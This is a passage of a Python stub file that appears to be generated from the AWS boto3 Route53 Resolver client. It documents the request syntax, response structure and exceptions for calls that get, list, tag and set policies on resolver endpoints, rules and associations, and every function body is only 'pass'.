'IpAddressCount': 123,
'HostVPCId': 'string',
'Status': 'CREATING'|'OPERATIONAL'|'UPDATING'|'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING',
'StatusMessage': 'string',
'CreationTime': 'string',
'ModificationTime': 'string'
}
}
Response Structure
(dict) --
ResolverEndpoint (dict) --Information about the resolver endpoint that you specified in a GetResolverEndpoint request.
Id (string) --The ID of the resolver endpoint.
CreatorRequestId (string) --A unique string that identifies the request that created the resolver endpoint. The CreatorRequestId allows failed requests to be retried without the risk of executing the operation twice.
Arn (string) --The ARN (Amazon Resource Name) for the resolver endpoint.
Name (string) --The name that you assigned to the resolver endpoint when you submitted a CreateResolverEndpoint request.
SecurityGroupIds (list) --The ID of one or more security groups that control access to this VPC. The security group must include one or more inbound resolver rules.
(string) --
Direction (string) --Indicates whether the resolver endpoint allows inbound or outbound DNS queries:
INBOUND : allows DNS queries to your VPC from your network or another VPC
OUTBOUND : allows DNS queries from your VPC to your network or another VPC
IpAddressCount (integer) --The number of IP addresses that the resolver endpoint can use for DNS queries.
HostVPCId (string) --The ID of the VPC that you want to create the resolver endpoint in.
Status (string) --A code that specifies the current status of the resolver endpoint.
StatusMessage (string) --A detailed description of the status of the resolver endpoint.
CreationTime (string) --The date and time that the endpoint was created, in Unix time format and Coordinated Universal Time (UTC).
ModificationTime (string) --The date and time that the endpoint was last modified, in Unix time format and Coordinated Universal Time (UTC).
Exceptions
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {
'ResolverEndpoint': {
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'Name': 'string',
'SecurityGroupIds': [
'string',
],
'Direction': 'INBOUND'|'OUTBOUND',
'IpAddressCount': 123,
'HostVPCId': 'string',
'Status': 'CREATING'|'OPERATIONAL'|'UPDATING'|'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING',
'StatusMessage': 'string',
'CreationTime': 'string',
'ModificationTime': 'string'
}
}
:returns:
INBOUND : allows DNS queries to your VPC from your network or another VPC
OUTBOUND : allows DNS queries from your VPC to your network or another VPC
"""
pass
def get_resolver_rule(ResolverRuleId=None):
"""
Gets information about a specified resolver rule, such as the domain name that the rule forwards DNS queries for and the ID of the outbound resolver endpoint that the rule is associated with.
See also: AWS API Documentation
Exceptions
:example: response = client.get_resolver_rule(
ResolverRuleId='string'
)
:type ResolverRuleId: string
:param ResolverRuleId: [REQUIRED]\nThe ID of the resolver rule that you want to get information about.\n
:rtype: dict
ReturnsResponse Syntax{
'ResolverRule': {
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'DomainName': 'string',
'Status': 'COMPLETE'|'DELETING'|'UPDATING'|'FAILED',
'StatusMessage': 'string',
'RuleType': 'FORWARD'|'SYSTEM'|'RECURSIVE',
'Name': 'string',
'TargetIps': [
{
'Ip': 'string',
'Port': 123
},
],
'ResolverEndpointId': 'string',
'OwnerId': 'string',
'ShareStatus': 'NOT_SHARED'|'SHARED_WITH_ME'|'SHARED_BY_ME'
}
}
Response Structure
(dict) --
ResolverRule (dict) --Information about the resolver rule that you specified in a GetResolverRule request.
Id (string) --The ID that Resolver assigned to the resolver rule when you created it.
CreatorRequestId (string) --A unique string that you specified when you created the resolver rule. CreatorRequestId identifies the request and allows failed requests to be retried without the risk of executing the operation twice.
Arn (string) --The ARN (Amazon Resource Name) for the resolver rule specified by Id .
DomainName (string) --DNS queries for this domain name are forwarded to the IP addresses that are specified in TargetIps . If a query matches multiple resolver rules (example.com and www.example.com), the query is routed using the resolver rule that contains the most specific domain name (www.example.com).
Status (string) --A code that specifies the current status of the resolver rule.
StatusMessage (string) --A detailed description of the status of a resolver rule.
RuleType (string) --This value is always FORWARD . Other resolver rule types aren\'t supported.
Name (string) --The name for the resolver rule, which you specified when you created the resolver rule.
TargetIps (list) --An array that contains the IP addresses and ports that you want to forward
(dict) --In a CreateResolverRule request, an array of the IPs that you want to forward DNS queries to.
Ip (string) --One IP address that you want to forward DNS queries to. You can specify only IPv4 addresses.
Port (integer) --The port at Ip that you want to forward DNS queries to.
ResolverEndpointId (string) --The ID of the endpoint that the rule is associated with.
OwnerId (string) --When a rule is shared with another AWS account, the account ID of the account that the rule is shared with.
ShareStatus (string) --Whether the rules is shared and, if so, whether the current account is sharing the rule with another account, or another account is sharing the rule with the current account.
Exceptions
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {
'ResolverRule': {
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'DomainName': 'string',
'Status': 'COMPLETE'|'DELETING'|'UPDATING'|'FAILED',
'StatusMessage': 'string',
'RuleType': 'FORWARD'|'SYSTEM'|'RECURSIVE',
'Name': 'string',
'TargetIps': [
{
'Ip': 'string',
'Port': 123
},
],
'ResolverEndpointId': 'string',
'OwnerId': 'string',
'ShareStatus': 'NOT_SHARED'|'SHARED_WITH_ME'|'SHARED_BY_ME'
}
}
"""
pass
def get_resolver_rule_association(ResolverRuleAssociationId=None):
"""
Gets information about an association between a specified resolver rule and a VPC. You associate a resolver rule and a VPC using AssociateResolverRule .
See also: AWS API Documentation
Exceptions
:example: response = client.get_resolver_rule_association(
ResolverRuleAssociationId='string'
)
:type ResolverRuleAssociationId: string
:param ResolverRuleAssociationId: [REQUIRED]\nThe ID of the resolver rule association that you want to get information about.\n
:rtype: dict
ReturnsResponse Syntax{
'ResolverRuleAssociation': {
'Id': 'string',
'ResolverRuleId': 'string',
'Name': 'string',
'VPCId': 'string',
'Status': 'CREATING'|'COMPLETE'|'DELETING'|'FAILED'|'OVERRIDDEN',
'StatusMessage': 'string'
}
}
Response Structure
(dict) --
ResolverRuleAssociation (dict) --Information about the resolver rule association that you specified in a GetResolverRuleAssociation request.
Id (string) --The ID of the association between a resolver rule and a VPC. Resolver assigns this value when you submit an AssociateResolverRule request.
ResolverRuleId (string) --The ID of the resolver rule that you associated with the VPC that is specified by VPCId .
Name (string) --The name of an association between a resolver rule and a VPC.
VPCId (string) --The ID of the VPC that you associated the resolver rule with.
Status (string) --A code that specifies the current status of the association between a resolver rule and a VPC.
StatusMessage (string) --A detailed description of the status of the association between a resolver rule and a VPC.
Exceptions
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {
'ResolverRuleAssociation': {
'Id': 'string',
'ResolverRuleId': 'string',
'Name': 'string',
'VPCId': 'string',
'Status': 'CREATING'|'COMPLETE'|'DELETING'|'FAILED'|'OVERRIDDEN',
'StatusMessage': 'string'
}
}
"""
pass
def get_resolver_rule_policy(Arn=None):
"""
Gets information about a resolver rule policy. A resolver rule policy specifies the Resolver operations and resources that you want to allow another AWS account to be able to use.
See also: AWS API Documentation
Exceptions
:example: response = client.get_resolver_rule_policy(
Arn='string'
)
:type Arn: string
:param Arn: [REQUIRED]\nThe ID of the resolver rule policy that you want to get information about.\n
:rtype: dict
ReturnsResponse Syntax{
'ResolverRulePolicy': 'string'
}
Response Structure
(dict) --
ResolverRulePolicy (string) --Information about the resolver rule policy that you specified in a GetResolverRulePolicy request.
Exceptions
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.UnknownResourceException
Route53Resolver.Client.exceptions.InternalServiceErrorException
:return: {
'ResolverRulePolicy': 'string'
}
"""
pass
def get_waiter(waiter_name=None):
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters\nsection of the service docs for a list of available waiters.
:rtype: botocore.waiter.Waiter
"""
pass
def list_resolver_endpoint_ip_addresses(ResolverEndpointId=None, MaxResults=None, NextToken=None):
"""
Gets the IP addresses for a specified resolver endpoint.
See also: AWS API Documentation
Exceptions
:example: response = client.list_resolver_endpoint_ip_addresses(
ResolverEndpointId='string',
MaxResults=123,
NextToken='string'
)
:type ResolverEndpointId: string
:param ResolverEndpointId: [REQUIRED]\nThe ID of the resolver endpoint that you want to get IP addresses for.\n
:type MaxResults: integer
:param MaxResults: The maximum number of IP addresses that you want to return in the response to a ListResolverEndpointIpAddresses request. If you don\'t specify a value for MaxResults , Resolver returns up to 100 IP addresses.
:type NextToken: string
:param NextToken: For the first ListResolverEndpointIpAddresses request, omit this value.\nIf the specified resolver endpoint has more than MaxResults IP addresses, you can submit another ListResolverEndpointIpAddresses request to get the next group of IP addresses. In the next request, specify the value of NextToken from the previous response.\n
:rtype: dict
ReturnsResponse Syntax
{
'NextToken': 'string',
'MaxResults': 123,
'IpAddresses': [
{
'IpId': 'string',
'SubnetId': 'string',
'Ip': 'string',
'Status': 'CREATING'|'FAILED_CREATION'|'ATTACHING'|'ATTACHED'|'REMAP_DETACHING'|'REMAP_ATTACHING'|'DETACHING'|'FAILED_RESOURCE_GONE'|'DELETING'|'DELETE_FAILED_FAS_EXPIRED',
'StatusMessage': 'string',
'CreationTime': 'string',
'ModificationTime': 'string'
},
]
}
Response Structure
(dict) --
NextToken (string) --
If the specified endpoint has more than MaxResults IP addresses, you can submit another ListResolverEndpointIpAddresses request to get the next group of IP addresses. In the next request, specify the value of NextToken from the previous response.
MaxResults (integer) --
The value that you specified for MaxResults in the request.
IpAddresses (list) --
The IP addresses that DNS queries pass through on their way to your network (outbound endpoint) or on the way to Resolver (inbound endpoint).
(dict) --
In the response to a GetResolverEndpoint request, information about the IP addresses that the resolver endpoint uses for DNS queries.
IpId (string) --
The ID of one IP address.
SubnetId (string) --
The ID of one subnet.
Ip (string) --
One IP address that the resolver endpoint uses for DNS queries.
Status (string) --
A status code that gives the current status of the request.
StatusMessage (string) --
A message that provides additional information about the status of the request.
CreationTime (string) --
The date and time that the IP address was created, in Unix time format and Coordinated Universal Time (UTC).
ModificationTime (string) --
The date and time that the IP address was last modified, in Unix time format and Coordinated Universal Time (UTC).
Exceptions
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.InvalidNextTokenException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {
'NextToken': 'string',
'MaxResults': 123,
'IpAddresses': [
{
'IpId': 'string',
'SubnetId': 'string',
'Ip': 'string',
'Status': 'CREATING'|'FAILED_CREATION'|'ATTACHING'|'ATTACHED'|'REMAP_DETACHING'|'REMAP_ATTACHING'|'DETACHING'|'FAILED_RESOURCE_GONE'|'DELETING'|'DELETE_FAILED_FAS_EXPIRED',
'StatusMessage': 'string',
'CreationTime': 'string',
'ModificationTime': 'string'
},
]
}
:returns:
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.InvalidNextTokenException
Route53Resolver.Client.exceptions.ThrottlingException
"""
pass
def list_resolver_endpoints(MaxResults=None, NextToken=None, Filters=None):
"""
Lists all the resolver endpoints that were created using the current AWS account.
See also: AWS API Documentation
Exceptions
:example: response = client.list_resolver_endpoints(
MaxResults=123,
NextToken='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
]
)
:type MaxResults: integer
:param MaxResults: The maximum number of resolver endpoints that you want to return in the response to a ListResolverEndpoints request. If you don\'t specify a value for MaxResults , Resolver returns up to 100 resolver endpoints.
:type NextToken: string
:param NextToken: For the first ListResolverEndpoints request, omit this value.\nIf you have more than MaxResults resolver endpoints, you can submit another ListResolverEndpoints request to get the next group of resolver endpoints. In the next request, specify the value of NextToken from the previous response.\n
:type Filters: list
:param Filters: An optional specification to return a subset of resolver endpoints, such as all inbound resolver endpoints.\n\nNote\nIf you submit a second or subsequent ListResolverEndpoints request and specify the NextToken parameter, you must use the same values for Filters , if any, as in the previous request.\n\n\n(dict) --For List operations, an optional specification to return a subset of objects, such as resolver endpoints or resolver rules.\n\nName (string) --When you\'re using a List operation and you want the operation to return a subset of objects, such as resolver endpoints or resolver rules, the name of the parameter that you want to use to filter objects. For example, to list only inbound resolver endpoints, specify Direction for the value of Name .\n\nValues (list) --When you\'re using a List operation and you want the operation to return a subset of objects, such as resolver endpoints or resolver rules, the value of the parameter that you want to use to filter objects. For example, to list only inbound resolver endpoints, specify INBOUND for the value of Values .\n\n(string) --\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'NextToken': 'string',
'MaxResults': 123,
'ResolverEndpoints': [
{
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'Name': 'string',
'SecurityGroupIds': [
'string',
],
'Direction': 'INBOUND'|'OUTBOUND',
'IpAddressCount': 123,
'HostVPCId': 'string',
'Status': 'CREATING'|'OPERATIONAL'|'UPDATING'|'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING',
'StatusMessage': 'string',
'CreationTime': 'string',
'ModificationTime': 'string'
},
]
}
Response Structure
(dict) --
NextToken (string) --
If more than MaxResults IP addresses match the specified criteria, you can submit another ListResolverEndpoint request to get the next group of results. In the next request, specify the value of NextToken from the previous response.
MaxResults (integer) --
The value that you specified for MaxResults in the request.
ResolverEndpoints (list) --
The resolver endpoints that were created by using the current AWS account, and that match the specified filters, if any.
(dict) --
In the response to a CreateResolverEndpoint , DeleteResolverEndpoint , GetResolverEndpoint , ListResolverEndpoints , or UpdateResolverEndpoint request, a complex type that contains settings for an existing inbound or outbound resolver endpoint.
Id (string) --
The ID of the resolver endpoint.
CreatorRequestId (string) --
A unique string that identifies the request that created the resolver endpoint. The CreatorRequestId allows failed requests to be retried without the risk of executing the operation twice.
Arn (string) --
The ARN (Amazon Resource Name) for the resolver endpoint.
Name (string) --
The name that you assigned to the resolver endpoint when you submitted a CreateResolverEndpoint request.
SecurityGroupIds (list) --
The ID of one or more security groups that control access to this VPC. The security group must include one or more inbound resolver rules.
(string) --
Direction (string) --
Indicates whether the resolver endpoint allows inbound or outbound DNS queries:
INBOUND : allows DNS queries to your VPC from your network or another VPC
OUTBOUND : allows DNS queries from your VPC to your network or another VPC
IpAddressCount (integer) --
The number of IP addresses that the resolver endpoint can use for DNS queries.
HostVPCId (string) --
The ID of the VPC that you want to create the resolver endpoint in.
Status (string) --
A code that specifies the current status of the resolver endpoint.
StatusMessage (string) --
A detailed description of the status of the resolver endpoint.
CreationTime (string) --
The date and time that the endpoint was created, in Unix time format and Coordinated Universal Time (UTC).
ModificationTime (string) --
The date and time that the endpoint was last modified, in Unix time format and Coordinated Universal Time (UTC).
Exceptions
Route53Resolver.Client.exceptions.InvalidNextTokenException
Route53Resolver.Client.exceptions.InvalidRequestException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {
'NextToken': 'string',
'MaxResults': 123,
'ResolverEndpoints': [
{
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'Name': 'string',
'SecurityGroupIds': [
'string',
],
'Direction': 'INBOUND'|'OUTBOUND',
'IpAddressCount': 123,
'HostVPCId': 'string',
'Status': 'CREATING'|'OPERATIONAL'|'UPDATING'|'AUTO_RECOVERING'|'ACTION_NEEDED'|'DELETING',
'StatusMessage': 'string',
'CreationTime': 'string',
'ModificationTime': 'string'
},
]
}
:returns:
(string) --
"""
pass
def list_resolver_rule_associations(MaxResults=None, NextToken=None, Filters=None):
"""
Lists the associations that were created between resolver rules and VPCs using the current AWS account.
See also: AWS API Documentation
Exceptions
:example: response = client.list_resolver_rule_associations(
MaxResults=123,
NextToken='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
]
)
:type MaxResults: integer
:param MaxResults: The maximum number of rule associations that you want to return in the response to a ListResolverRuleAssociations request. If you don\'t specify a value for MaxResults , Resolver returns up to 100 rule associations.
:type NextToken: string
:param NextToken: For the first ListResolverRuleAssociation request, omit this value.\nIf you have more than MaxResults rule associations, you can submit another ListResolverRuleAssociation request to get the next group of rule associations. In the next request, specify the value of NextToken from the previous response.\n
:type Filters: list
:param Filters: An optional specification to return a subset of resolver rules, such as resolver rules that are associated with the same VPC ID.\n\nNote\nIf you submit a second or subsequent ListResolverRuleAssociations request and specify the NextToken parameter, you must use the same values for Filters , if any, as in the previous request.\n\n\n(dict) --For List operations, an optional specification to return a subset of objects, such as resolver endpoints or resolver rules.\n\nName (string) --When you\'re using a List operation and you want the operation to return a subset of objects, such as resolver endpoints or resolver rules, the name of the parameter that you want to use to filter objects. For example, to list only inbound resolver endpoints, specify Direction for the value of Name .\n\nValues (list) --When you\'re using a List operation and you want the operation to return a subset of objects, such as resolver endpoints or resolver rules, the value of the parameter that you want to use to filter objects. For example, to list only inbound resolver endpoints, specify INBOUND for the value of Values .\n\n(string) --\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'NextToken': 'string',
'MaxResults': 123,
'ResolverRuleAssociations': [
{
'Id': 'string',
'ResolverRuleId': 'string',
'Name': 'string',
'VPCId': 'string',
'Status': 'CREATING'|'COMPLETE'|'DELETING'|'FAILED'|'OVERRIDDEN',
'StatusMessage': 'string'
},
]
}
Response Structure
(dict) --
NextToken (string) --
If more than MaxResults rule associations match the specified criteria, you can submit another ListResolverRuleAssociation request to get the next group of results. In the next request, specify the value of NextToken from the previous response.
MaxResults (integer) --
The value that you specified for MaxResults in the request.
ResolverRuleAssociations (list) --
The associations that were created between resolver rules and VPCs using the current AWS account, and that match the specified filters, if any.
(dict) --
In the response to an AssociateResolverRule , DisassociateResolverRule , or ListResolverRuleAssociations request, information about an association between a resolver rule and a VPC.
Id (string) --
The ID of the association between a resolver rule and a VPC. Resolver assigns this value when you submit an AssociateResolverRule request.
ResolverRuleId (string) --
The ID of the resolver rule that you associated with the VPC that is specified by VPCId .
Name (string) --
The name of an association between a resolver rule and a VPC.
VPCId (string) --
The ID of the VPC that you associated the resolver rule with.
Status (string) --
A code that specifies the current status of the association between a resolver rule and a VPC.
StatusMessage (string) --
A detailed description of the status of the association between a resolver rule and a VPC.
Exceptions
Route53Resolver.Client.exceptions.InvalidNextTokenException
Route53Resolver.Client.exceptions.InvalidRequestException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {
'NextToken': 'string',
'MaxResults': 123,
'ResolverRuleAssociations': [
{
'Id': 'string',
'ResolverRuleId': 'string',
'Name': 'string',
'VPCId': 'string',
'Status': 'CREATING'|'COMPLETE'|'DELETING'|'FAILED'|'OVERRIDDEN',
'StatusMessage': 'string'
},
]
}
:returns:
Route53Resolver.Client.exceptions.InvalidNextTokenException
Route53Resolver.Client.exceptions.InvalidRequestException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
"""
pass
def list_resolver_rules(MaxResults=None, NextToken=None, Filters=None):
"""
Lists the resolver rules that were created using the current AWS account.
See also: AWS API Documentation
Exceptions
:example: response = client.list_resolver_rules(
MaxResults=123,
NextToken='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
]
)
:type MaxResults: integer
:param MaxResults: The maximum number of resolver rules that you want to return in the response to a ListResolverRules request. If you don\'t specify a value for MaxResults , Resolver returns up to 100 resolver rules.
:type NextToken: string
:param NextToken: For the first ListResolverRules request, omit this value.\nIf you have more than MaxResults resolver rules, you can submit another ListResolverRules request to get the next group of resolver rules. In the next request, specify the value of NextToken from the previous response.\n
:type Filters: list
:param Filters: An optional specification to return a subset of resolver rules, such as all resolver rules that are associated with the same resolver endpoint.\n\nNote\nIf you submit a second or subsequent ListResolverRules request and specify the NextToken parameter, you must use the same values for Filters , if any, as in the previous request.\n\n\n(dict) --For List operations, an optional specification to return a subset of objects, such as resolver endpoints or resolver rules.\n\nName (string) --When you\'re using a List operation and you want the operation to return a subset of objects, such as resolver endpoints or resolver rules, the name of the parameter that you want to use to filter objects. For example, to list only inbound resolver endpoints, specify Direction for the value of Name .\n\nValues (list) --When you\'re using a List operation and you want the operation to return a subset of objects, such as resolver endpoints or resolver rules, the value of the parameter that you want to use to filter objects. For example, to list only inbound resolver endpoints, specify INBOUND for the value of Values .\n\n(string) --\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'NextToken': 'string',
'MaxResults': 123,
'ResolverRules': [
{
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'DomainName': 'string',
'Status': 'COMPLETE'|'DELETING'|'UPDATING'|'FAILED',
'StatusMessage': 'string',
'RuleType': 'FORWARD'|'SYSTEM'|'RECURSIVE',
'Name': 'string',
'TargetIps': [
{
'Ip': 'string',
'Port': 123
},
],
'ResolverEndpointId': 'string',
'OwnerId': 'string',
'ShareStatus': 'NOT_SHARED'|'SHARED_WITH_ME'|'SHARED_BY_ME'
},
]
}
Response Structure
(dict) --
NextToken (string) --
If more than MaxResults resolver rules match the specified criteria, you can submit another ListResolverRules request to get the next group of results. In the next request, specify the value of NextToken from the previous response.
MaxResults (integer) --
The value that you specified for MaxResults in the request.
ResolverRules (list) --
The resolver rules that were created using the current AWS account and that match the specified filters, if any.
(dict) --
For queries that originate in your VPC, detailed information about a resolver rule, which specifies how to route DNS queries out of the VPC. The ResolverRule parameter appears in the response to a CreateResolverRule , DeleteResolverRule , GetResolverRule , ListResolverRules , or UpdateResolverRule request.
Id (string) --
The ID that Resolver assigned to the resolver rule when you created it.
CreatorRequestId (string) --
A unique string that you specified when you created the resolver rule. CreatorRequestId identifies the request and allows failed requests to be retried without the risk of executing the operation twice.
Arn (string) --
The ARN (Amazon Resource Name) for the resolver rule specified by Id .
DomainName (string) --
DNS queries for this domain name are forwarded to the IP addresses that are specified in TargetIps . If a query matches multiple resolver rules (example.com and www.example.com), the query is routed using the resolver rule that contains the most specific domain name (www.example.com).
Status (string) --
A code that specifies the current status of the resolver rule.
StatusMessage (string) --
A detailed description of the status of a resolver rule.
RuleType (string) --
This value is always FORWARD . Other resolver rule types aren\'t supported.
Name (string) --
The name for the resolver rule, which you specified when you created the resolver rule.
TargetIps (list) --
An array that contains the IP addresses and ports that you want to forward
(dict) --
In a CreateResolverRule request, an array of the IPs that you want to forward DNS queries to.
Ip (string) --
One IP address that you want to forward DNS queries to. You can specify only IPv4 addresses.
Port (integer) --
The port at Ip that you want to forward DNS queries to.
ResolverEndpointId (string) --
The ID of the endpoint that the rule is associated with.
OwnerId (string) --
When a rule is shared with another AWS account, the account ID of the account that the rule is shared with.
ShareStatus (string) --
Whether the rules is shared and, if so, whether the current account is sharing the rule with another account, or another account is sharing the rule with the current account.
Exceptions
Route53Resolver.Client.exceptions.InvalidNextTokenException
Route53Resolver.Client.exceptions.InvalidRequestException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {
'NextToken': 'string',
'MaxResults': 123,
'ResolverRules': [
{
'Id': 'string',
'CreatorRequestId': 'string',
'Arn': 'string',
'DomainName': 'string',
'Status': 'COMPLETE'|'DELETING'|'UPDATING'|'FAILED',
'StatusMessage': 'string',
'RuleType': 'FORWARD'|'SYSTEM'|'RECURSIVE',
'Name': 'string',
'TargetIps': [
{
'Ip': 'string',
'Port': 123
},
],
'ResolverEndpointId': 'string',
'OwnerId': 'string',
'ShareStatus': 'NOT_SHARED'|'SHARED_WITH_ME'|'SHARED_BY_ME'
},
]
}
:returns:
Route53Resolver.Client.exceptions.InvalidNextTokenException
Route53Resolver.Client.exceptions.InvalidRequestException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
"""
pass
def list_tags_for_resource(ResourceArn=None, MaxResults=None, NextToken=None):
"""
Lists the tags that you associated with the specified resource.
See also: AWS API Documentation
Exceptions
:example: response = client.list_tags_for_resource(
ResourceArn='string',
MaxResults=123,
NextToken='string'
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) for the resource that you want to list tags for.\n
:type MaxResults: integer
:param MaxResults: The maximum number of tags that you want to return in the response to a ListTagsForResource request. If you don\'t specify a value for MaxResults , Resolver returns up to 100 tags.
:type NextToken: string
:param NextToken: For the first ListTagsForResource request, omit this value.\nIf you have more than MaxResults tags, you can submit another ListTagsForResource request to get the next group of tags for the resource. In the next request, specify the value of NextToken from the previous response.\n
:rtype: dict
ReturnsResponse Syntax
{
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
Tags (list) --
The tags that are associated with the resource that you specified in the ListTagsForResource request.
(dict) --
One tag that you want to add to the specified resource. A tag consists of a Key (a name for the tag) and a Value .
Key (string) --
The name for the tag. For example, if you want to associate Resolver resources with the account IDs of your customers for billing purposes, the value of Key might be account-id .
Value (string) --
The value for the tag. For example, if Key is account-id , then Value might be the ID of the customer account that you\'re creating the resource for.
NextToken (string) --
If more than MaxResults tags match the specified criteria, you can submit another ListTagsForResource request to get the next group of results. In the next request, specify the value of NextToken from the previous response.
Exceptions
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InvalidNextTokenException
Route53Resolver.Client.exceptions.InvalidRequestException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'NextToken': 'string'
}
:returns:
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InvalidNextTokenException
Route53Resolver.Client.exceptions.InvalidRequestException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
"""
pass
def put_resolver_rule_policy(Arn=None, ResolverRulePolicy=None):
"""
Specifies the Resolver operations and resources that you want to allow another AWS account to be able to use.
See also: AWS API Documentation
Exceptions
:example: response = client.put_resolver_rule_policy(
Arn='string',
ResolverRulePolicy='string'
)
:type Arn: string
:param Arn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the account that you want to grant permissions to.\n
:type ResolverRulePolicy: string
:param ResolverRulePolicy: [REQUIRED]\nAn AWS Identity and Access Management policy statement that lists the permissions that you want to grant to another AWS account.\n
:rtype: dict
ReturnsResponse Syntax
{
'ReturnValue': True|False
}
Response Structure
(dict) --
The response to a PutResolverRulePolicy request.
ReturnValue (boolean) --
Whether the PutResolverRulePolicy request was successful.
Exceptions
Route53Resolver.Client.exceptions.InvalidPolicyDocument
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.UnknownResourceException
Route53Resolver.Client.exceptions.InternalServiceErrorException
:return: {
'ReturnValue': True|False
}
:returns:
Route53Resolver.Client.exceptions.InvalidPolicyDocument
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.UnknownResourceException
Route53Resolver.Client.exceptions.InternalServiceErrorException
"""
pass
def tag_resource(ResourceArn=None, Tags=None):
"""
Adds one or more tags to a specified resource.
See also: AWS API Documentation
Exceptions
:example: response = client.tag_resource(
ResourceArn='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) for the resource that you want to add tags to. To get the ARN for a resource, use the applicable Get or List command:\n\nGetResolverEndpoint\nGetResolverRule\nGetResolverRuleAssociation\nListResolverEndpoints\nListResolverRuleAssociations\nListResolverRules\n\n
:type Tags: list
:param Tags: [REQUIRED]\nThe tags that you want to add to the specified resource.\n\n(dict) --One tag that you want to add to the specified resource. A tag consists of a Key (a name for the tag) and a Value .\n\nKey (string) --The name for the tag. For example, if you want to associate Resolver resources with the account IDs of your customers for billing purposes, the value of Key might be account-id .\n\nValue (string) --The value for the tag. For example, if Key is account-id , then Value might be the ID of the customer account that you\'re creating the resource for.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
Route53Resolver.Client.exceptions.LimitExceededException
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InvalidTagException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {}
:returns:
(dict) --
"""
pass
def untag_resource(ResourceArn=None, TagKeys=None):
"""
Removes one or more tags from a specified resource.
See also: AWS API Documentation
Exceptions
:example: response = client.untag_resource(
ResourceArn='string',
TagKeys=[
'string',
]
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) for the resource that you want to remove tags from. To get the ARN for a resource, use the applicable Get or List command:\n\nGetResolverEndpoint\nGetResolverRule\nGetResolverRuleAssociation\nListResolverEndpoints\nListResolverRuleAssociations\nListResolverRules\n\n
:type TagKeys: list
:param TagKeys: [REQUIRED]\nThe tags that you want to remove to the specified resource.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
Route53Resolver.Client.exceptions.ResourceNotFoundException
Route53Resolver.Client.exceptions.InvalidParameterException
Route53Resolver.Client.exceptions.InternalServiceErrorException
Route53Resolver.Client.exceptions.ThrottlingException
:return: {}
:returns:
(dict) --
"""
pass
